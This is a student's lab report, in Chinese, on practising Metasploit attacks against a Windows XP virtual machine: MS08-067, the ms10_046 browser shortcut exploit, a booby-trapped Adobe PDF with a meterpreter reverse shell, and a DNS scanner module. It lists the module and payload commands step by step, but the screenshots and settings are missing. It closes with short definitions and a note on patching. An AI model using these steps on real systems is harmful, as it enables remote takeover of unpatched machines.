20155210 Exp5 MSF基础应用
Exp5 MSF基礎應用
一個主動攻擊實踐,MS08-067
首先利用msfconsole啟用msf終端
然后利用search MS08-067搜索漏洞,會顯示相應漏洞模塊
如圖:
根據上圖,我們輸入use exploit/windows/smb/ms08_067_netapi,選擇相應的模塊
然后我們可以使用show payloads,查看可以使用的模塊
如圖:
然后根據上圖,為獲取靶機的shell,所以利用set payload generic/shell_reverse_tcp
然后輸入show options,查看配置信息,知道我們需要配置RHOST,LHOST,LPORT,target
如圖:- 輸入
進行配置
然后我們再次利用show options,查看配置信息
如圖:然后exploit進行監聽
如圖:
- 如果出現如下情況,關閉防火墻,就可以解決
針對瀏覽器的攻擊,ms10_046
起初我打算做ms11_050,攻擊IE瀏覽器,但是IE8.0版本,不能成功,可能是IE8.0已經修復相關漏洞了。
所以我選擇了ms10_046,首先輸入search ms10_046查找漏洞
如圖:
由于我們要對瀏覽器進行攻擊,所以我們輸入use use exploit/windows/browser/ms10_046_shortcut_icon_
然后我們輸入show payloads,查看載荷進行選擇,這里我仍用實驗一中的載荷set payload generic/shell_reverse_tcp
如圖:
我們利用show options查詢需要配置的有,LPORT,LHOST,SRVHOST
- 輸入
進行配置
- 再次查看配置信息
如圖:
- 然后輸入exploit生成URL
如圖:
在windows端訪問該URL,kali端如圖:
輸入sessions,可看到一個ID為1的連接
如圖:然后輸入session -i 1,接入ID為1的連接,輸入shell,獲取成功。
如圖:
針對客戶端的攻擊
首先還是先利用search adobe進行搜索
如圖:然后進行選擇,我選擇的是use windows/fileformat/adobe_flashplayer_button
然后set payload windows/meterpreter/reverse_tcp,設置所用荷載,利用show options查看所要配置的信息
如圖:- 輸入如下代碼,對LHOST,LPORT,FILENAME進行配置
輸入exploit,生成20155210.pdf文件
如圖:輸入use exploit/multi/handler,進入監聽,并設置監聽端口,主機號
在windows端,打開20155210.pdf,成功回連
如圖:
輔助模塊應用
- 首先利用show auxiliary,查看輔助模塊
我選擇的是scanner/dns/dns_amp,掃描dns
輸入show options,查看配置
輸入exploit進行監聽
基礎問題
用自己的話解釋什么是exploit,payload,encode
exploit:針對靶機的漏洞,利用靶機中的后門,對靶機進行攻擊
payload:相當于shellcode前身,也就是后門的模板
encode:對payload進行編碼
實驗體會
我們應該盡可能的,去更新最新版的軟件和系統,否則就會給黑客可乘之機。
比如,我們做的實驗都是基于xp系統的,但是如果對win7、8、10,進行攻擊則無效。
比如,我在做實驗2時,想做老師給的例子,但是那個漏洞對IE8.0不好使。
我們沒有一個可以針對現用系統或者軟件的滲透攻擊庫,離實戰還是很遠的
轉載于:https://www.cnblogs.com/panyinghao/p/8921439.html
總結
以上是生活随笔為你收集整理的20155210 Exp5 MSF基础应用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: sprMVC详解
- 下一篇: (转)解决fasterxml中strin